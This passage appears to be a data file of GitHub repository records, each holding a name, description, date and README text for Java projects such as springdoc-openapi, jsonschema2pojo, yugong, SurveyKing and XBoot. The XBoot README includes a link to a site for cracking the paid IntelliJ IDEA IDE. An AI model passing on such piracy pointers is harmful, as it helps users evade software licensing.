-springdoc-openapi works by examining an application at runtime to infer API semantics -based on Spring configurations, class structure and various annotations. - -The library automatically generates documentation in JSON/YAML and HTML formatted pages. -The generated documentation can be complemented using `swagger-api` annotations. - -This library supports: - -* OpenAPI 3 -* Spring-boot v3 (Java 17 & Jakarta EE 9) -* JSR-303, specifically for @NotNull, @Min, @Max, and @Size. -* Swagger-ui -* OAuth 2 -* GraalVM native images - -The following video introduces the Library: - -* [https://youtu.be/utRxyPfFlDw](https://youtu.be/utRxyPfFlDw) - -For *spring-boot v3* support, make sure you use [springdoc-openapi v2](https://springdoc.org/) - -This is a community-based project, not maintained by the Spring Framework Contributors (Pivotal) - -# **Getting Started** - -## Library for springdoc-openapi integration with spring-boot and swagger-ui - -* Automatically deploys swagger-ui to a Spring Boot 3.x application -* Documentation will be available in HTML format, using the - official [swagger-ui jars](https://github.com/swagger-api/swagger-ui.git). -* The Swagger UI page should then be available at http://server: - port/context-path/swagger-ui.html and the OpenAPI description will be available at the - following url for json format: http://server:port/context-path/v3/api-docs - * `server`: The server name or IP - * `port`: The server port - * `context-path`: The context path of the application -* Documentation can be available in yaml format as well, on the following path: - `/v3/api-docs.yaml` -* Add the `springdoc-openapi-ui` library to the list of your project dependencies (No - additional configuration is needed): - -```xml - - org.springdoc - springdoc-openapi-starter-webmvc-ui - last-release-version - -``` - -* This step is optional: For custom path of the swagger documentation in HTML format, add - a custom springdoc property, in your spring-boot configuration file: - -```properties -# swagger-ui custom path -springdoc.swagger-ui.path=/swagger-ui.html -``` - -## Spring-boot with OpenAPI Demo applications. - -### [Source Code for Demo Applications](https://github.com/springdoc/springdoc-openapi-demos/tree/master). - -## [Demo Spring Boot 3 Web MVC with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webmvc). - -## [Demo Spring Boot 3 WebFlux with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux/swagger-ui.html). - -## [Demo Spring Boot 3 WebFlux with Functional endpoints OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux-functional/swagger-ui.html). - -## [Demo Spring Boot 3 and Spring Cloud Function Web MVC](https://demos.springdoc.org/spring-cloud-function-webmvc). - -## [Demo Spring Boot 3 and Spring Cloud Function WebFlux](http://158.101.191.70:8085/swagger-ui.html). - -## [Demo Spring Boot 3 and Spring Cloud Gateway](https://demos.springdoc.org/demo-microservices/swagger-ui.html). - -![Branching](https://springdoc.org/img/pets.png) - -## Integration of the library in a Spring Boot 3.x project without the swagger-ui: - -* Documentation will be available at the following url for json format: http://server: - port/context-path/v3/api-docs - * `server`: The server name or IP - * `port`: The server port - * `context-path`: The context path of the application -* Documentation will be available in yaml format as well, on the following - path : `/v3/api-docs.yaml` -* Add the library to the list of your project dependencies. (No additional configuration - is needed) - -```xml - - org.springdoc - springdoc-openapi-starter-webmvc-api - last-release-version - -``` - -* This step is optional: For custom path of the OpenAPI documentation in Json format, add - a custom springdoc property, in your spring-boot configuration file: - -```properties -# /api-docs endpoint custom path -springdoc.api-docs.path=/api-docs -``` - -* This step is optional: If you want to disable `springdoc-openapi` endpoints, add a - custom springdoc property, in your `spring-boot` configuration file: - -```properties -# disable api-docs -springdoc.api-docs.enabled=false -``` - -## Error Handling for REST using @ControllerAdvice - -To generate documentation automatically, make sure all the methods declare the HTTP Code -responses using the annotation: @ResponseStatus. - -## Adding API Information and Security documentation - -The library uses spring-boot application auto-configured packages to scan for the -following annotations in spring beans: OpenAPIDefinition and Info. -These annotations declare, API Information: Title, version, licence, security, servers, -tags, security and externalDocs. -For better performance of documentation generation, declare `@OpenAPIDefinition` -and `@SecurityScheme` annotations within a Spring managed bean. - -## spring-webflux support with Annotated Controllers - -* Documentation can be available in yaml format as well, on the following path : - /v3/api-docs.yaml -* Add the library to the list of your project dependencies (No additional configuration - is needed) - -```xml - - org.springdoc - springdoc-openapi-starter-webflux-ui - last-release-version - -``` - -* This step is optional: For custom path of the swagger documentation in HTML format, add - a custom springdoc property, in your spring-boot configuration file: - -```properties -# swagger-ui custom path -springdoc.swagger-ui.path=/swagger-ui.html -``` - -The `springdoc-openapi` libraries are hosted on maven central repository. -The artifacts can be viewed accessed at the following locations: - -Releases: - -* [https://s01.oss.sonatype.org/content/groups/public/org/springdoc/](https://s01.oss.sonatype.org/content/groups/public/org/springdoc/) - . - -Snapshots: - -* [https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/](https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/) - . - -# Acknowledgements - -## Contributors - -springdoc-openapi is relevant and updated regularly due to the valuable contributions from -its [contributors](https://github.com/springdoc/springdoc-openapi/graphs/contributors). - - - - - -Thanks you all for your support! - -## Additional Support - -* [Spring Team](https://spring.io/team) - Thanks for their support by sharing all relevant - resources around Spring projects. -* [JetBrains](https://www.jetbrains.com/?from=springdoc-openapi) - Thanks a lot for - supporting springdoc-openapi project. - -![JenBrains logo](https://springdoc.org/img/jetbrains.svg) -",0 -joelittlejohn/jsonschema2pojo,"Generate Java types from JSON or JSON Schema and annotate those types for data-binding with Jackson, Gson, etc",2013-06-22T22:28:53Z,,"# jsonschema2pojo [![Build Status](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml/badge.svg?query=branch%3Amaster)](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml?query=branch%3Amaster) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.jsonschema2pojo/jsonschema2pojo/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.jsonschema2pojo%22) - -_jsonschema2pojo_ generates Java types from JSON Schema (or example JSON) and can annotate those types for data-binding with Jackson 2.x or Gson. - -### [Try jsonschema2pojo online](http://jsonschema2pojo.org/)
or `brew install jsonschema2pojo` - -You can use jsonschema2pojo as a Maven plugin, an Ant task, a command line utility, a Gradle plugin or embedded within your own Java app. The [Getting Started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started) guide will show you how. - -A very simple Maven example: -```xml - - org.jsonschema2pojo - jsonschema2pojo-maven-plugin - 1.2.1 - - ${basedir}/src/main/resources/schema - com.example.types - - - - - generate - - - - -``` - -A very simple Gradle example: - -```groovy -plugins { - id ""java"" - id ""org.jsonschema2pojo"" version ""1.2.1"" -} - -repositories { - mavenCentral() -} - -dependencies { - implementation 'com.fasterxml.jackson.core:jackson-databind:2.15.2' -} - -jsonSchema2Pojo { - targetPackage = 'com.example' -} -``` - -Useful pages: - * **[Getting started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started)** - * **[How to contribute](https://github.com/joelittlejohn/jsonschema2pojo/blob/master/CONTRIBUTING.md)** - * [Reference](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Reference) - * [Latest Javadocs](https://joelittlejohn.github.io/jsonschema2pojo/javadocs/1.2.1/) - * [Documentation for the Maven plugin](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/generate-mojo.html) - * [Documentation for the Gradle plugin](https://github.com/joelittlejohn/jsonschema2pojo/tree/master/jsonschema2pojo-gradle-plugin#usage) - * [Documentation for the Ant task](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/Jsonschema2PojoTask.html) - -Project resources: - * [Downloads](https://github.com/joelittlejohn/jsonschema2pojo/releases) - * [Mailing list](https://groups.google.com/forum/#!forum/jsonschema2pojo-users) - -Special thanks: -* unkish -* Thach Hoang -* Dan Cruver -* Ben Manes -* Sam Duke -* Duane Zamrok -* Christian Trimble -* YourKit, who support this project through a free license for the [YourKit Java Profiler](https://www.yourkit.com/java/profiler). - -Licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0). -",0 -secure-software-engineering/FlowDroid,FlowDroid Static Data Flow Tracker,2018-01-08T16:11:45Z,,,0 -alibaba/yugong,"阿里巴巴去Oracle数据迁移同步工具(全量+增量,目标支持MySQL/DRDS)",2016-03-02T07:31:00Z,,"## 背景 - -2008年,阿里巴巴开始尝试使用 MySQL 支撑其业务,开发了围绕 MySQL 相关的中间件和工具,Cobar/TDDL(目前为阿里云DRDS产品),解决了单机 Oracle 无法满足的扩展性问题,当时也掀起一股去IOE项目的浪潮,愚公这项目因此而诞生,其要解决的目标就是帮助用户完成从 Oracle 数据迁移到 MySQL 上,完成去 IOE 的重要一步工作。 - -## 项目介绍 - - -名称:   yugong - -译意:   愚公移山 - -语言:   纯java开发 - -定位:   数据库迁移 (目前主要支持oracle / mysql / DRDS) - -## 项目介绍 - - -整个数据迁移过程,分为两部分: - -1. 全量迁移 -2. 增量迁移 - -![](https://camo.githubusercontent.com/9a9cc09c5a7598239da20433857be61c54481b9c/687474703a2f2f646c322e69746579652e636f6d2f75706c6f61642f6174746163686d656e742f303131352f343531312f31306334666134632d626634342d333165352d623531312d6231393736643164373636392e706e67) - -过程描述: - -1. 增量数据收集 (创建oracle表的增量物化视图) -2. 进行全量复制 -3. 进行增量复制 (可并行进行数据校验) -4. 原库停写,切到新库 - -## 架构 - - -![](http://dl2.iteye.com/upload/attachment/0115/5473/8532d838-d4b2-371b-af9f-829d4127b1b8.png){width=""584"" -height=""206""} - -说明:  - -1. 一个Jvm Container对应多个instance,每个instance对应于一张表的迁移任务 -2.  instance分为三部分 - a.  extractor  (从源数据库上提取数据,可分为全量/增量实现) - b.  translator  (将源库上的数据按照目标库的需求进行自定义转化) - c.  applier  (将数据更新到目标库,可分为全量/增量/对比的实现) - -## 方案设计 - -[DevDesign](https://github.com/alibaba/yugong/wiki/DevDesign) - -## 快速开始 - -[QuickStart](https://github.com/alibaba/yugong/wiki/QuickStart) - -## 运维管理 - -[AdminGuide](https://github.com/alibaba/yugong/wiki/AdminGuide) - -## 性能报告 - -[Performance](https://github.com/alibaba/yugong/wiki/Performance) - -## 相关资料 - -1. yugong简单介绍ppt: [ppt](https://github.com/alibaba/yugong/blob/master/docs/yugong_Intro.ppt?raw=true) -2. [分布式关系型数据库服务DRDS](https://www.aliyun.com/product/drds) - (前身为阿里巴巴公司的Cobar/TDDL的演进版本, 基本原理为MySQL分库分表) - -## 沟通与交流 - -1. 详见 wiki home 页 - -",0 -aaberg/sql2o,"sql2o is a small library, which makes it easy to convert the result of your sql-statements into objects. No resultset hacking required. Kind of like an orm, but without the sql-generation capabilities. Supports named parameters.",2011-05-18T21:13:57Z,,"# sql2o [![Github Actions Build](https://github.com/aaberg/sql2o/actions/workflows/pipeline.yml/badge.svg)](https://github.com/aaberg/sql2o/actions) [![Maven Central](https://img.shields.io/maven-central/v/org.sql2o/sql2o.svg)](https://search.maven.org/search?q=g:org.sql2o%20a:sql2o) - - -Sql2o is a small java library, with the purpose of making database interaction easy. -When fetching data from the database, the ResultSet will automatically be filled into your POJO objects. -Kind of like an ORM, but without the SQL generation capabilities. -Sql2o requires at Java 7 or 8 to run. Java versions past 8 may work, but is currently not supported. - -# Announcements -*2024-03-12* | [Sql2o 1.7.0 was released](https://github.com/aaberg/sql2o/discussions/365) - - -# Examples - -Check out the [sql2o website](http://www.sql2o.org) for examples. - -# Coding guidelines. - -When hacking sql2o, please follow [these coding guidelines](https://github.com/aaberg/sql2o/wiki/Coding-guidelines). -",0 -javahuang/SurveyKing,Make a better survey system.,2021-09-06T13:34:14Z,,"# 卷王 - -简体中文 | [English](./README.en-us.md) - -## 功能最强大的调查问卷系统和考试系统 - -[点击](https://wj.surveyking.cn/s/start)卷王问卷考试系统-快速开始 - -需要您的 star ⭐️⭐️⭐️ 支持鼓励 🙏🙏🙏,**右上角点 Star (非强制)加QQ群(1074277968)获取最新的数据库脚本**。 - -## 快速开始(一键部署) - -### 🚀 1 分钟快速体验调查问卷系统(无需安装数据库) - -1. 下载卷王快速体验安装包(加群) -2. 解压,双击运行 start.bat -3. 打开浏览器访问 [http://localhost:1991](http://localhost:1991),输入账号密码: *admin*/*123456* - -### 一键 docker 部署 - -```bash -docker run -p 1991:1991 surveyking/surveyking -``` - -## 特性 - -- 🥇 支持 20 多种题型,如填空、选择、下拉、级联、矩阵、分页、签名、题组、上传、[横向填空](https://wj.surveyking.cn/s/EMqvs7)等 -- 🎉 多种创建问卷方式,Excel导入问卷、文本导入问卷、在线编辑器编辑问卷 -- 💪 多种问卷设置,支持白名单答卷、公开查询、答卷限制等 -- 🎇 数据,支持问卷数据新增、编辑、标记、导出、打印、预览和打包下载附件 -- 🎨 报表,支持对问题实时统计分析并以图形(条形图、柱形图、扇形图)、表格的形式展示输出和导出 -- 🚀 安装部署简单(**最快 1 分钟部署**),支持一键windows部署、一键docker部署、前后端分离部署、单jar部署、二级目录部署 -- 🥊 响应式布局,所有页面完美适配电脑端和移动端(包含问卷编辑、设置、答卷) -- 👬 支持多人协作管理问卷 -- 🎁 后端支持多种数据库,可支持所有带有 jdbc 驱动的关系型数据库 -- 🐯 安全、可靠、稳定、高性能的后端 API 服务 -- 🙆 支持完善的 RBAC 权限控制 -- 🦋 支持可视化配置问卷跳转和显示逻辑,以及通过公式实现自定义逻辑(卷王的逻辑设置比目前主流商业调查问卷系统强大的多) - - **显示隐藏逻辑** - - **值计算逻辑** 动态计算问题答案,从最简单的根据身高体重计算BMI,到复杂的根据多个问题答案组合逻辑和数值实现复杂的运算 - - **文本替换逻辑** 动态显示题目内容 - - **值校验逻辑** 可以根据其他问题答案来判断当前问题是否有效 - - **必填逻辑** 动态判断当前问题是否必填 - - **选项自动勾选逻辑** 根据其他问题和选项答案自动勾选 - - **选项显示隐藏逻辑** 动态的显示或者隐藏选项 - - **结束问卷逻辑** - - **跳转逻辑** 动态跳转 - - **结束问卷自定义提示语逻辑** 答卷后,可以根据问卷答案或者考试分数来显示不同的提示语信息 - - **自定义跳转链接逻辑** 答卷后,可以根据问卷答案或者考试分数来跳转到不同的链接,且支持携带答案参数 -- 🌈 支持选项唯一设置,多问卷数据关联查询、更新和删除,考试自动算分,自定义提示语,自定义跳转链接等等 - -## 问卷产品对比 - -| | 问卷网 | 腾讯问卷 | 问卷星 | 金数据 | 卷王 | -| --------------- | ------ | -------- | ------ | ------ | ---- | -| 问卷调查 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ | -| 在线考试 | ✔️ | ❌ | ✔️ | ✔️ | ✔️ | -| 投票 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ | -| 支持题型 | 🥇 | 🥉 | 🥇 | 🥈 | 🥈 | -| 题型设置 | 🥇 | 🥉 | 🥇 | 🥇 | 🥇 | -| 自动计算 | ❌ | ❌ | 🥉 | 🥈 | 🥇 | -| 逻辑设置 | 🥈 | 🥈 | 🥈 | 🥈 | 🥇 | -| 自定义校验 | ❌ | ❌ | ❌ | ❌ | ✔️ | -| 自定义导出 | 🥈 | ❌ | ❌ | 🥉 | 🥇 | -| 手机端编辑 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ | -| 公开查询(快查) | ✔️ | ❌ | ✔️ | ❌ | ✔️ | -| 私有部署 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 🆓 | - -注: 上表与卷王对比的全部是商业问卷产品,他们有很多地方值得卷王学习,仅列出部分主要功能供大家参考,如果对结果有疑问,可以点击对应产品的链接自行对比体验。 - -🥇强 🥈中 🥉弱 - -## 友情推荐 - -[专注于中台化架构的低代码生成工具](https://gitee.com/orangeform/orange-admin) - -## 预览截图 - -* 考试系统预览 - - - - - - - - - - - - - - - - - - -
- -* 调查问卷预览 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-",0 -shatyuka/Zhiliao,知乎去广告Xposed模块,2020-11-09T07:17:35Z,,"# 知了 - -知乎去广告Xposed模块 - -[![Chat](https://img.shields.io/badge/Telegram-Chat-blue.svg?logo=telegram)](https://t.me/joinchat/OibCWxbdCMkJ2fG8J1DpQQ) -[![Subscribe](https://img.shields.io/badge/Telegram-Subscribe-blue.svg?logo=telegram)](https://t.me/zhiliao) -[![Download](https://img.shields.io/github/v/release/shatyuka/Zhiliao?label=Download)](https://github.com/shatyuka/Zhiliao/releases/latest) -[![Stars](https://img.shields.io/github/stars/shatyuka/Zhiliao?label=Stars)](https://github.com/shatyuka/Zhiliao) -[![License](https://img.shields.io/github/license/shatyuka/Zhiliao?label=License)](https://choosealicense.com/licenses/gpl-3.0/) - -## 功能 - -- 广告 - - 去启动页广告 - - 去信息流广告 - - 去回答列表广告 - - 去评论广告 - - 去分享广告 - - 去回答底部广告 - - 去搜索广告 -- 其他 - - 过滤视频 - - 过滤文章 - - 去信息流会员推荐 - - 去回答圈子 - - 去商品推荐 - - 去相关搜索 - - 去关键字搜索 - - 直接打开外部链接 - - 禁止切换色彩模式 - - 显示卡片类别 - - 状态栏沉浸 - - 禁止进入全屏模式 - - 解锁第三方登录 -- 界面净化 - - 移除直播按钮 - - 不显示小红点 - - 隐藏会员卡片 - - 隐藏热点通知 - - 精简文章页面 - - 隐藏置顶热门 - - 隐藏混合卡片 -- 导航栏 - - 隐藏会员按钮 - - 隐藏视频按钮 - - 隐藏关注按钮 - - 隐藏发布按钮 - - 隐藏发现按钮 - - 禁用活动主题 - - 隐藏导航栏突起 -- 左右划 - - 左右划切换回答 - - 移除下一个回答按钮 -- 自定义过滤 -- 注入JS脚本 -- 清理临时文件 - -## 帮助 -[Github Wiki](https://github.com/shatyuka/Zhiliao/wiki) - -## 下载 -[Github Release](https://github.com/shatyuka/Zhiliao/releases/latest) - -[Xposed Repo](https://repo.xposed.info/module/com.shatyuka.zhiliao) - -[蓝奏云](https://wwa.lanzoux.com/b00tscbwd) 密码:1hax - -## License - -This project is licensed under the [GNU General Public Licence, version 3](https://choosealicense.com/licenses/gpl-3.0/). -",0 -zhoutaoo/SpringCloud,基于SpringCloud2.1的微服务开发脚手架,整合了spring-security-oauth2、nacos、feign、sentinel、springcloud-gateway等。服务治理方面引入elasticsearch、skywalking、springboot-admin、zipkin等,让项目开发快速进入业务开发,而不需过多时间花费在架构搭建上。持续更新中,2017-07-23T14:28:08Z,,,0 -locationtech/jts,The JTS Topology Suite is a Java library for creating and manipulating vector geometry.,2016-01-25T18:08:41Z,,"JTS Topology Suite -================== - -The JTS Topology Suite is a Java library for creating and manipulating vector geometry. It also provides a comprehensive set of geometry test cases, and the TestBuilder GUI application for working with and visualizing geometry and JTS functions. - -![JTS logo](jts_logo.png) - -[![Travis Build Status](https://api.travis-ci.org/locationtech/jts.svg)](http://travis-ci.org/locationtech/jts) [![GitHub Action Status](https://github.com/locationtech/jts/workflows/GitHub%20CI/badge.svg)](https://github.com/locationtech/jts/actions) - -[![Join the chat at https://gitter.im/locationtech/jts](https://badges.gitter.im/locationtech/jts.svg)](https://gitter.im/locationtech/jts?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) - - -JTS is a project in the [LocationTech](http://www.locationtech.org) working group of the Eclipse Foundation. - -![LocationTech](locationtech_mark.png) - -## Requirements - -Currently JTS targets Java 1.8 and above. - -## Resources - -### Code -* [GitHub Repo](https://github.com/locationtech/jts) -* [Maven Central group](https://mvnrepository.com/artifact/org.locationtech.jts) - -### Websites -* [LocationTech Home](https://locationtech.org/projects/technology.jts) -* [GitHub web site](https://locationtech.github.io/jts/) - -### Communication -* [Mailing List](https://accounts.eclipse.org/mailing-list/jts-dev) -* [Gitter Channel](https://gitter.im/locationtech/jts) - -### Forums -* [Stack Overflow](https://stackoverflow.com/questions/tagged/jts) -* [GIS Stack Exchange](https://gis.stackexchange.com/questions/tagged/jts-topology-suite) - -## License - -JTS is open source software. It is dual-licensed under: - -* [Eclipse Public License 2.0](https://www.eclipse.org/legal/epl-v20.html) -* [Eclipse Distribution License 1.0](http://www.eclipse.org/org/documents/edl-v10.php) (a BSD Style License) - -See also: - -* [License details](LICENSES.md) -* Licensing [FAQ](FAQ-LICENSING.md) - -## Documentation - -* [**Javadoc**](https://locationtech.github.io/jts/javadoc) for the latest version of JTS -* [**FAQ**](https://locationtech.github.io/jts/jts-faq.html) - Frequently Asked Questions -* [**User Guide**](USING.md) - Installing and using JTS -* [**Tools**](doc/TOOLS.md) - Guide to tools included with JTS -* [**Developing Guide**](DEVELOPING.md) - how to build and develop for JTS -* [**Upgrade Guide**](MIGRATION.md) - How to migrate from previous versions of JTS - -## History - -* [**Version History**](https://github.com/locationtech/jts/blob/master/doc/JTS_Version_History.md) -* History from the previous JTS SourceForge repo is in the branch [`_old/history`](https://github.com/locationtech/jts/tree/_old/history) -* Older versions of JTS can be found on SourceForge -* There is an archive of distros of older versions [here](https://github.com/dr-jts/jts-versions) - -## Contributing - -If you are interested in contributing to JTS please read the [**Contributing Guide**](CONTRIBUTING.md). - -## Downstream Projects - -### Derivatives (ports to other languages) -* [**GEOS**](https://trac.osgeo.org/geos) - C++ -* [**NetTopologySuite**](https://github.com/NetTopologySuite/NetTopologySuite) - .NET -* [**JSTS**](https://github.com/bjornharrtell/jsts) - JavaScript -* [**dart_jts**](https://github.com/moovida/dart_jts) - Dart - -### Via GEOS -* [**Shapely**](https://github.com/Toblerity/Shapely) - Python wrapper of GEOS -* [**R-GEOS**](https://cran.r-project.org/web/packages/rgeos/index.html) - R wrapper of GEOS -* [**rgeo**](https://github.com/rgeo/rgeo) - Ruby wrapper of GEOS -* [**GEOSwift**](https://github.com/GEOSwift/GEOSwift)- Swift library using GEOS - -There are many projects using GEOS - for a list see the [GEOS wiki](https://trac.osgeo.org/geos/wiki/Applications). - - -",0 -corretto/corretto-8,"Amazon Corretto 8 is a no-cost, multi-platform, production-ready distribution of OpenJDK 8",2018-11-07T19:49:10Z,,"## Corretto 8 - -Amazon Corretto is a no-cost, multiplatform, production-ready distribution of the Open Java Development Kit (OpenJDK). Corretto is used internally at Amazon for production services. With Corretto, you can develop and run Java applications on operating systems such as Amazon Linux 2, Windows, and macOS. - -The latest binary Corretto 8 release builds can be downloaded from [https://github.com/corretto/corretto-8/releases](https://github.com/corretto/corretto-8/releases). - -Documentation is available at [https://docs.aws.amazon.com/corretto](https://docs.aws.amazon.com/corretto). - -### Licenses and Trademarks - -Please read these files: ""LICENSE"", ""THIRD_PARTY_README"", ""ASSEMBLY_EXCEPTION"", ""TRADEMARKS.md"". - -### Branches - -_develop_ -: The default branch. It absorbs active development contributions from forks or topic branches via pull requests that pass smoke testing and are accepted. - -_master_ -: The stable branch. Starting point for the release process. It absorbs contributions from the develop branch that pass more thorough testing and are selected for releasing. - -_ga-release_ -: The source code of the GA release on 01/31/2019. - -_preview-release_ -: The source code of the preview release on 11/14/2018. - -_release-8.XXX.YY.Z_ -: The source code for each release is recorded by a branch or a tag with a name of this form. XXX stands for the OpenJDK 8 update number, YY for the OpenJDK 8 build number, and Z for the Corretto-specific revision number. The latter starts at 1 and is incremented in subsequent releases as long as the update and build number remain constant. - -### OpenJDK Readme -``` - -Welcome to the JDK! -=================== - -For build instructions please see https://openjdk.java.net/groups/build/doc/building.html, -or either of these files: - -- doc/building.html (html version) -- doc/building.md (markdown version) - -See https://openjdk.java.net for more information about the OpenJDK Community and the JDK. -``` -",0 -HelloWorld521/Java,java项目实战练习,2016-12-08T14:01:46Z,,"# Java - -##### [中文](README_ZH.md) - -## Project Descriptions - -Below here are some of my java project exercise codes, I would like to share it with everyone, hope that we are able to improve with everyone! - -## Java Projects - -* [swagger2-boot-starter](https://github.com/HelloWorld521/swagger2-boot-starter) - -* [SpringBoot-Shiro](./springboot-shiro/) - -* [SECKILL](./seckill/) - -* [Woss2.0 ](./woss/) - -* [tomcatServlet3.0 Web Server](./tomcatServer3.0/) - -* [ServletAjax ](./ServletAjax/) - -* [JspChat jsp Chatroom](./JspChat/) - -* [eStore library system](./estore/) - -* [checkcode Java captcha code generator](./checkcode/) - -* [IMOOCSpider easy internet spider](./IMOOCSpider/) - -## Last - -If any of the projects above is able to help you out, please do click on ""Star"" on top right-hand-site. Thank you! -",0 -Exrick/xboot,基于Spring Boot 2.x的一站式前后端分离快速开发平台XBoot 微信小程序+Uniapp 前端:Vue+iView Admin 后端:Spring Boot 2.x/Spring Security/JWT/JPA+Mybatis-Plus/Redis/Elasticsearch/Activiti 分布式限流/同步锁/验证码/SnowFlake雪花算法ID 动态权限 数据权限 工作流 代码生成 定时任务 社交账号 短信登录 单点登录 OAuth2开放平台 客服机器人 数据大屏 暗黑模式,2018-04-23T14:44:18Z,,"# XBoot -[![AUR](https://img.shields.io/badge/GPL-v3-red)](https://github.com/Exrick/xmall/blob/master/License) -[![](https://img.shields.io/badge/Author-Exrick-orange.svg)](http://blog.exrick.cn) -[![](https://img.shields.io/badge/version-3.3.4-brightgreen.svg)](https://github.com/Exrick/x-boot) -[![GitHub stars](https://img.shields.io/github/stars/Exrick/x-boot.svg?style=social&label=Stars)](https://github.com/Exrick/x-boot) -[![GitHub forks](https://img.shields.io/github/forks/Exrick/x-boot.svg?style=social&label=Fork)](https://github.com/Exrick/x-boot) - -### 宣传视频 -- [作者亲自制作XBoot文字快闪宣传视频](http://www.bilibili.com/av30284667) -- [作者亲自制作其他项目宣传视频](https://www.bilibili.com/video/av23121122/) -### 宣传官网 -- 官网地址:http://xb.exrick.cn -- 官网源码:https://github.com/Exrick/xboot-show -### 在线Demo -- 在线Demo:http://xboot.exrick.cn -- 单点登录测试页:http://sso.exrick.cn -- 统一认证平台访问地址:http://xboot.exrick.cn/authorize -### 最新最全面在线文档 -https://www.kancloud.cn/exrick/xboot/content -### 前台基于Vue+iView项目地址: [xboot-front](https://github.com/Exrick/xboot-front) -### 版本说明 -- xboot-fast:单应用版本 -- xboot-module:多模块版本 -### 项目简介 -- [x] 代码拥有详细注释 无复杂逻辑 核心使用 SpringBoot 2.4.8 -- [x] JWT / 基于Redis可配置单设备登录Token交互 任意切换 提供开放平台、OAuth2认证中心 支持点单登录 -- [x] JPA + Mybatis-Plus 任意切换 -- [x] 操作日志记录方式任意切换Mysql或Elasticseach记录 -- [x] Java、Vue、SQL代码生成效率翻四倍 -- [x] 动态权限管理、多维度轻松控制权限按钮显示、数据权限管理 -- [x] 支持社交账号、短信等多方式登录 不干涉原用户数据 实现第三方账号管理 -- [x] 基于Websocket消息推送管理、基于Quartz定时任务管理、数据字典管理 -- [x] 后台提供分布式限流、同步锁、验证码等工具类 前端提供丰富Vue模版 -- [x] 可动态配置短信、邮件、Vaptcha验证码等 -- [x] 为什么要前后端分离 - - 都什么时代了还在用JQuery? - -![](https://ooo.0o0.ooo/2019/04/29/5cc70cac4b7a4.png) - -### 截图预览 - -- PC - -![QQ截图20180826163917.png](https://ooo.0o0.ooo/2021/07/01/t6RXqn8LeaY5Nu1.png) - -![QQ截图20180826164058.png](https://ooo.0o0.ooo/2021/07/01/TQZqrxog4ufX2SR.png) - -![QQ截图20180826164144.png](https://ooo.0o0.ooo/2021/07/01/t7RdWhkbzZCawce.png) - -- iPad Mini 5 - - - -- iPhone X - - - - -### [完整版截图细节展示](https://github.com/Exrick/x-boot/wiki/%E5%AE%8C%E6%95%B4%E7%89%88%E6%88%AA%E5%9B%BE%E7%BB%86%E8%8A%82%E5%B1%95%E7%A4%BA) - -### 系统架构 - - - -### 前端所用技术 -- Vue 2.6.x、Vue Cli 4.x、iView、iview-admin、iview-area、Vuex、Vue Router、ES6、webpack、axios、echarts、cookie等 -- 前台为基于Vue+iView的独立项目请跳转至 [xboot-front](https://github.com/Exrick/xboot-front) 项目仓库查看 -### 后端所用技术 - - - -##### 各框架依赖版本皆使用目前最新版本 -- Spring Boot -- SpringMVC -- Spring Security -- [Spring Data JPA](https://docs.spring.io/spring-data/jpa/docs/2.2.2.RELEASE/reference/html/) -- [MyBatis-Plus](http://mp.baomidou.com):已更新至3.x版本 -- [Redis](https://github.com/Exrick/xmall/blob/master/study/Redis.md) -- [Elasticsearch](https://github.com/Exrick/xmall/blob/master/study/Elasticsearch.md):基于Lucene分布式搜索引擎 -- [Druid](http://druid.io/):阿里高性能数据库连接池(偏监控 注重性能可使用默认HikariCP) [Druid配置官方中文文档](https://github.com/alibaba/druid/tree/master/druid-spring-boot-starter) -- [Json Web Token(JWT)](https://jwt.io/) -- [Quartz](http://www.quartz-scheduler.org):定时任务 -- [Beetl](http://ibeetl.com/guide/#beetl):模版引擎 代码生成使用 -- [Thymeleaf](https://www.thymeleaf.org/):发送模版邮件使用 -- [Hutool](http://hutool.mydoc.io/):Java工具包 -- [Jasypt](https://github.com/ulisesbocchio/jasypt-spring-boot):配置文件加密(thymeleaf作者开发) -- [Swagger2](https://github.com/Exrick/xmall/blob/master/study/Swagger2.md):Api文档生成 -- MySQL -- [Nginx](https://github.com/Exrick/xmall/blob/master/study/Nginx.md) -- [Maven](https://github.com/Exrick/xmall/blob/master/study/Maven.md) -- 第三方SDK或服务 - - [七牛云文件存储服务](https://developer.qiniu.com/kodo/sdk/1239/java) - - [腾讯位置服务](https://lbs.qq.com/webservice_v1/guide-ip.html):需申请填入key后免费使用 - - 完整版 - - [Vaptcha人机验证码](https://www.vaptcha.com/) - - [阿里云短信服务](https://dysms.console.aliyun.com) -- 其它开发工具 - - [Lombok](https://projectlombok.org/) - - [JRebel](https://github.com/Exrick/xmall/blob/master/study/JRebel.md):开发秒级热部署 - - [阿里JAVA开发规约插件](https://github.com/alibaba/p3c) - -### 最新最全面在线文档 - -> 第一时间更新,文档永不收费 - -https://www.kancloud.cn/exrick/xboot/content - -### 本地运行部署 -- 安装依赖并启动:[Redis](https://github.com/Exrick/xmall/blob/master/study/Redis.md)、[Elasticsearch](https://github.com/Exrick/xmall/blob/master/study/Elasticsearch.md)(当配置使用ES记录日志时需要) -- [Maven安装和在IDEA中配置](https://github.com/Exrick/xmall/blob/master/study/Maven.md) -- 建议使用IDEA([破解/免费注册](http://idea.lanyus.com/)) 安装 `Lombok` 插件后导入该Maven项目 若未自动下载依赖请在根目录下执行 `mvn install` 命令 -- MySQL数据库新建 `xboot` 